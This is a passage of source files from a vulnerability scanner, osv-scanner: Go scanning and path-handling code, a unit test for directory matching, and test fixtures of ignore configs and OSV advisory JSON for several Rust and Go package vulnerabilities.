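func scan(accessors ExternalAccessors, actions ScannerActions) (*inventory.Inventory, error) {
	var inv inventory.Inventory

	plugins := getPlugins(
		[]string{"lockfile", "sbom", "directory"},
		accessors,
		actions,
	)

	// technically having one detector enabled would also be sufficient, but we're
	// not mentioning them to avoid confusion since they're still in their infancy
	if countNotEnrichers(plugins) == 0 {
		return nil, errors.New("at least one extractor must be enabled")
	}

	scanner := scalibr.New()

	// Build list of paths for each root
	// On linux this would return a map with just one entry of /
	rootMap := map[string][]string{}
	// Also build a map of specific plugin overrides that the user specify
	// map[path]parseAs
	overrideMap := map[string]filesystem.Extractor{}
	// List of specific paths the user passes in so that we can check that they all get processed.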
specificPaths := make([]string, 0, len(actions.LockfilePaths)+len(actions.SBOMPaths)) statsCollector := fileOpenedPrinter{ filesExtracted: make(map[string]struct{}), } // --- Directories --- for _, path := range actions.DirectoryPaths { cmdlogger.Infof("Scanning dir %s", path) if _, err := pathToRootMap(rootMap, path, actions.Recursive); err != nil { return nil, err } } // --- Lockfiles --- for _, lockfileElem := range actions.LockfilePaths { parseAs, path := scanners.ParseLockfilePath(lockfileElem) absPath, err := pathToRootMap(rootMap, path, actions.Recursive) if err != nil { return nil, err } specificPaths = append(specificPaths, absPath) if parseAs != "" { plug, err := scanners.ParseAsToPlugin(parseAs, plugins) if err != nil { return nil, err } overrideMap[absPath] = plug } } // --- SBOMs (Deprecated) --- // none of the SBOM extractors need configuring sbomExtractors := scalibrplugin.Resolve([]string{"sbom"}, []string{}, &cpb.PluginConfig{}) SBOMLoop: for _, sbomPath := range actions.SBOMPaths { absPath, err := pathToRootMap(rootMap, sbomPath, actions.Recursive) if err != nil { return nil, err } specificPaths = append(specificPaths, absPath) for _, se := range sbomExtractors { // All sbom extractors are filesystem extractors sbomExtractor := se.(filesystem.Extractor) if sbomExtractor.FileRequired(simplefileapi.New(absPath, nil)) { overrideMap[absPath] = sbomExtractor continue SBOMLoop } } cmdlogger.Errorf("Failed to parse SBOM %q: Invalid SBOM filename.", sbomPath) cmdlogger.Errorf("If you believe this is a valid SBOM, make sure the filename follows format per your SBOMs specification.") return nil, fmt.Errorf("invalid SBOM filename: %s", sbomPath) } // --- Add git commits directly --- gitDirectPlugin := gitcommitdirect.New(actions.GitCommits) if len(rootMap) == 0 && len(actions.GitCommits) > 0 { // Even if there's no actual paths, if we have git commits, still do the scan rootMap = map[string][]string{ "/": {}, } } testlogger.BeginDirScanMarker() osCapability 
:= determineOS() // Parse exclude patterns (supports exact names, glob, and regex) excludePatterns, err := parseExcludePatterns(actions.ExcludePatterns) if err != nil { return nil, fmt.Errorf("failed to parse exclude patterns: %w", err) } capabilities := plugin.Capabilities{ DirectFS: true, RunningSystem: true, Network: plugin.NetworkOnline, OS: osCapability, AllowUnsafePlugins: true, } if actions.CompareOffline { capabilities.Network = plugin.NetworkOffline } filteredPlugins := append(plugin.FilterByCapabilities(plugins, &capabilities), gitDirectPlugin) logUnsafePlugins(filteredPlugins) // For each root, run scalibr's scan() once. for root, paths := range rootMap { sr := scanner.Scan(context.Background(), &scalibr.ScanConfig{ Plugins: filteredPlugins, Capabilities: &capabilities, ScanRoots: fs.RealFSScanRoots(root), PathsToExtract: paths, IgnoreSubDirs: !actions.Recursive, DirsToSkip: excludePatterns.dirsToSkip, SkipDirRegex: excludePatterns.regexPattern, SkipDirGlob: excludePatterns.globPattern, UseGitignore: !actions.NoIgnore, Stats: &statsCollector, ReadSymlinks: false, MaxInodes: 0, StoreAbsolutePath: true, PrintDurationAnalysis: false, ErrorOnFSErrors: false, ExplicitPlugins: true, ExtractorOverride: func(api filesystem.FileAPI) []filesystem.Extractor { ext, ok := overrideMap[filepath.Join(root, filepath.FromSlash(api.Path()))] if ok { return []filesystem.Extractor{ext} } return []filesystem.Extractor{} }, }) // --- Check status of the run --- if sr.Status.Status == plugin.ScanStatusFailed { return nil, errors.New(sr.Status.FailureReason) } for _, status := range sr.PluginStatus { if status.Status.Status != plugin.ScanStatusSucceeded { builder := strings.Builder{} criticalError := false for _, fileError := range status.Status.FileErrors { if len(status.Status.FileErrors) > 1 { // If there is more than 1 file error, write them on new lines builder.WriteString("\n\t") } fmt.Fprintf(&builder, "%s: %s", fileError.FilePath, fileError.ErrorMessage) // Check if the 
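erroring file was a path specifically passed in (not a result of a file walk)
					if slices.Contains(specificPaths, filepath.Join(root, fileError.FilePath)) {
						criticalError = true
					}
				}

				msg := status.Status.FailureReason
				if len(status.Status.FileErrors) > 0 {
					msg = builder.String()
				}

				cmdlogger.Errorf("Error during extraction: (extracting as %s) %s", status.Name, msg)

				if criticalError {
					return nil, errors.New("extraction failed on specified lockfile")
				}
			}
		}

		slices.SortFunc(sr.Inventory.Packages, inventorySort)
		invsCompact := slices.CompactFunc(sr.Inventory.Packages, func(a, b *extractor.Package) bool {
			return inventorySort(a, b) == 0
		})
		sr.Inventory.Packages = invsCompact
		inv.GenericFindings = append(inv.GenericFindings, sr.Inventory.GenericFindings...)
		inv.Packages = append(inv.Packages, sr.Inventory.Packages...)
	}

	testlogger.EndDirScanMarker()

	// Check if specific paths have been extracted.
	// This allows us to error if a specific file provided by the user failed to extract, and return an error for them.
	for _, path := range specificPaths {
		if _, ok := statsCollector.filesExtracted[path]; !ok {
			return nil, fmt.Errorf("%w: %q", ErrExtractorNotFound, path)
		}
	}

	if len(inv.Packages) == 0 {
		return nil, ErrNoPackagesFound
	}

	return &inv, nil
}

// pathToRootMap saves the absolute path into the root map, and returns the absolute path.
// path is only saved if it does not fall under an existing path.
// IMPORTANT: it does not remove existing paths already added to the rootMap, so add directories before specific files.
//
// The path is made absolute with filepath.Abs and must exist (os.Stat fails otherwise);
// it is then filed under the key returned by getRootDir. Whether it falls under an
// already-registered path is decided lexically by isDescendent on the absolute path:
// symlinks are not resolved here, so two spellings of the same directory are treated
// as distinct targets.
func pathToRootMap(rootMap map[string][]string, path string, recursive bool) (string, error) {
	absPath, err := filepath.Abs(path)
	if err != nil {
		return "", err
	}

	fi, err := os.Stat(absPath)
	if err != nil {
		return "", fmt.Errorf("failed to resolve path: %w", err)
	}

	root := getRootDir(absPath)

	// If path is a directory and we are not recursively scanning, then always add it as a target.
	if fi.IsDir() && !recursive {
		rootMap[root] = append(rootMap[root], absPath)
		return absPath, nil
	}

	// Otherwise, only add if it's not a descendent of an existing path
	for _, existing := range rootMap[root] {
		if isDescendent(existing, absPath, recursive) {
			return absPath, nil
		}
	}

	rootMap[root] = append(rootMap[root], absPath)

	return absPath, nil
}

// isDescendent returns whether `path` is either a descendent or a direct child of `potentialParent`
// recursive = true: checks for descendents
// recursive = false: checks for direct children
//
// A path equal to potentialParent counts as a match in both modes. The comparison is
// purely lexical (filepath.Rel); nothing is looked up on disk.
func isDescendent(potentialParent, path string, recursive bool) bool {
	rel, err := filepath.Rel(potentialParent, path)
	if err != nil {
		// Rel could not express path relative to potentialParent; treat it as unrelated.
		return false
	}

	if rel == "." {
		// Same as an existing path, skip
		return true
	}

	// Rel returns a cleaned path, so a result that leaves potentialParent is either
	// exactly ".." or begins with ".." followed by a separator. Testing only for a
	// ".." prefix would also reject children whose own name starts with two dots
	// (for example "..cache"), and pathToRootMap would then register them as
	// separate targets even though an existing directory already covers them.
	sep := string(filepath.Separator)
	if rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return false
	}

	if recursive {
		// Descendant of existing dir, and we are recursively scanning, so skip
		return true
	}

	// Non-recursive: only a direct child (a single path element) counts.
	return !strings.Contains(rel, sep)
}

// getRootDir returns the root directory on each system.
// On Unix systems, it'll be /
// On Windows, it will most likely be the drive (e.g.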
C:\)
// Any other path (for example a relative one on a non-Windows system) yields "".
func getRootDir(path string) string {
	switch {
	case runtime.GOOS == "windows":
		return filepath.VolumeName(path) + "\\"
	case strings.HasPrefix(path, "/"):
		return "/"
	default:
		return ""
	}
}

// determineOS maps runtime.GOOS onto the plugin OS value used for capability
// filtering. Systems other than windows, darwin and linux log a warning and
// fall back to plugin.OSAny.
func determineOS() plugin.OS {
	known := map[string]plugin.OS{
		"windows": plugin.OSWindows,
		"darwin":  plugin.OSMac,
		"linux":   plugin.OSLinux,
	}

	if detected, ok := known[runtime.GOOS]; ok {
		return detected
	}

	cmdlogger.Warnf("Unknown OS \"%s\" - results might be inaccurate", runtime.GOOS)

	return plugin.OSAny
}

================================================
FILE: pkg/osvscanner/scan_test.go
================================================
package osvscanner

import (
	"path/filepath"
	"testing"
)

// Test_isDescendent checks isDescendent against absolute and relative paths in
// both recursive and non-recursive mode.
func Test_isDescendent(t *testing.T) {
	t.Parallel()

	// Paths are written with forward slashes and converted per-OS inside each subtest.
	cases := []struct {
		name            string
		potentialParent string
		path            string
		recursive       bool
		want            bool
	}{
		{name: "same_path", potentialParent: "/a/b", path: "/a/b", recursive: true, want: true},
		{name: "direct_child,_recursive", potentialParent: "/a/b", path: "/a/b/c", recursive: true, want: true},
		{name: "direct_child,_non-recursive", potentialParent: "/a/b", path: "/a/b/c", recursive: false, want: true},
		{name: "grandchild,_recursive", potentialParent: "/a/b", path: "/a/b/c/d", recursive: true, want: true},
		{name: "grandchild,_non-recursive", potentialParent: "/a/b", path: "/a/b/c/d", recursive: false, want: false},
		{name: "not_a_descendent", potentialParent: "/a/b", path: "/a/c", recursive: true, want: false},
		{name: "different_root", potentialParent: "/a/b", path: "/x/y", recursive: true, want: false},
		{name: "relative_path,_direct_child,_recursive", potentialParent: "a/b", path: "a/b/c", recursive: true, want: true},
		{name: "relative_path,_grandchild,_non-recursive", potentialParent: "a/b", path: "a/b/c/d", recursive: false, want: false},
		{name: "relative_path,_not_a_descendent", potentialParent: "a/b", path: "a/c", recursive: true, want: false},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			// Normalize paths for the current OS
			parent := filepath.FromSlash(tc.potentialParent)
			candidate := filepath.FromSlash(tc.path)

			got := isDescendent(parent, candidate, tc.recursive)
			if got != tc.want {
				t.Errorf("isDescendent(%q, %q, %v) = %v, want %v", tc.potentialParent, tc.path, tc.recursive, got, tc.want)
			}
		})
	}
}

================================================
FILE: pkg/osvscanner/stats.go
================================================
package osvscanner

import (
	"path/filepath"

	"github.com/google/osv-scalibr/stats"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/output"
)

// fileOpenedPrinter is a stats collector that remembers every file an extractor
// was run on and logs the package count of each extraction that did not error.
type fileOpenedPrinter struct {
	stats.NoopCollector

	// filesExtracted is the set of system paths seen by AfterExtractorRun,
	// including files whose extraction reported an error.
	filesExtracted map[string]struct{}
}

var _ stats.Collector = &fileOpenedPrinter{}

// AfterExtractorRun records the extracted file under its system path (the stats
// root joined with the OS-native form of the reported path) and, when the run
// reported no error, logs how many packages were found in it.
func (c *fileOpenedPrinter) AfterExtractorRun(_ string, extractorstats *stats.AfterExtractorStats) {
	// The map is created lazily so a zero-value collector is usable.
	if c.filesExtracted == nil {
		c.filesExtracted = map[string]struct{}{}
	}

	fullPath := filepath.Join(extractorstats.Root, filepath.FromSlash(extractorstats.Path))
	c.filesExtracted[fullPath] = struct{}{}

	// Don't log scanned if error occurred
	if extractorstats.Error == nil {
		count := len(extractorstats.Inventory.Packages)
		cmdlogger.Infof(
			"Scanned %s file and found %d %s",
			fullPath,
			count,
			output.Form(count, "package", "packages"),
		)
	}
}

================================================
FILE: pkg/osvscanner/testdata/filter/.gitignore
================================================
out.json

================================================
FILE: pkg/osvscanner/testdata/filter/all/configs/a/osv-scanner.toml
================================================
# An entry for every vulnerability (including aliases)
[[IgnoredVulns]]
id = "GHSA-mc8h-8q98-g5hr"
reason = "Ignore 1" # Alias of RUSTSEC-2023-0018

[[IgnoredVulns]]
id = "RUSTSEC-2023-0018"
reason = "Redundant Ignore 1" # Redundant ignore statement - Alias of GHSA-mc8h-8q98-g5hr

[[IgnoredVulns]]
id = "GHSA-wcg3-cvx6-7396"
reason = "Ignore 2" # Alias of
RUSTSEC-2020-0071 [[IgnoredVulns]] id = "RUSTSEC-2020-0071" reason = "Redundant Ignore 2" # Redundant ignore statement - Alias of GHSA-wcg3-cvx6-7396 ================================================ FILE: pkg/osvscanner/testdata/filter/all/configs/b/osv-scanner.toml ================================================ # One entry for each vulnerability group [[IgnoredVulns]] id = "GHSA-fxg5-wq6x-vr4w" reason = "Ignore 1" # Alias of GO-2023-1495 [[IgnoredVulns]] id = "GO-2022-1144" reason = "Ignore 2" # Alias of GHSA-xrjj-mj9h-534m [[IgnoredVulns]] id = "CVE-2022-41723" reason = "Ignore 3" # Alias of GHSA-vvpx-j8f3-3w6h and GO-2023-1571 ================================================ FILE: pkg/osvscanner/testdata/filter/all/configs/c/osv-scanner.toml ================================================ # One entry for each vulnerability group [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 [[IgnoredVulns]] id = "RUSTSEC-2020-0071" reason = "Ignore 2" # Alias of GHSA-wcg3-cvx6-7396 [[IgnoredVulns]] id = "RUSTSEC-2023-0015" reason = "Ignore 3" # No aliases [[IgnoredVulns]] id = "GHSA-mrrw-grhq-86gf" reason = "Ignore 4" # No aliases ================================================ FILE: pkg/osvscanner/testdata/filter/all/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/all/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/all/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, 
"vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", 
"nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. 
